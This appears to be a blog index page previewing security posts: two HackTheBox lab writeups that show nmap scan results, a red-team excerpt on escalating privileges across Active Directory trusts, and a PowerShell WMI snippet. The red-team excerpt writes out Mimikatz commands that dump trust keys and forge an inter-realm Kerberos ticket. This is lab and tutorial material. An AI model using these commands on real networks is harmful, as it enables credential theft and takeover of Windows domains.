HACKTHEBOX * Vulnerable Machine Writeup

TEACHER (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.153
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-20 22:42 EDT
Nmap scan report for 10.10.10.153
Host is up (0.14s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know…

HACKTHEBOX * Vulnerable Machine Writeup

ELLINGSON (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.139
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 13:51 GMT
Nmap scan report for 10.10.10.139
Host is up (0.25s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:e8:f1:2a:80:62:de:7e:02:40:a1:f4:30:d2:88:a6 (RSA)
|   256 c8:02:cf:a0:f2:d8:5d:4f:7d:c7:66:0b:4d:5d:0b:df (ECDSA)
|_…

Powershell * RED TEAM SECURITY

Privilege Escalation Across Trust

Priv esc across domains: trust tickets:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::trust /patch"'
An inter-realm TGT can be forged:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi"'
Gets a TGT for a service (CIFS below) in the target domain by using the forged trust ticket.
PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> asktgs.exe C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration\ticket.kirbi CIFS/WIN-2RUMVG5JPOC.security.local…

Powershell * WMI

Classes Remove an Object

WMI returns live, editable objects, so please be careful while removing an object:
PS C:\Windows\system32> Get-WmiObject -Class win32_process | Where-Object {$_.Name -eq "notepad.exe"} | Remove-WmiObject
PS C:\Windows\system32> Get-CimInstance -ClassName win32_process -Filter "Name = 'notepad.exe'" | Remove-CimInstance
PS C:\Windows\system32> Get-WmiObject -Class win32_process -Filter 'Name = "calculator.exe"'
PS C:\Windows\system32> Get-WmiObject -Class win32_process -List
Exploring Methods: Find all…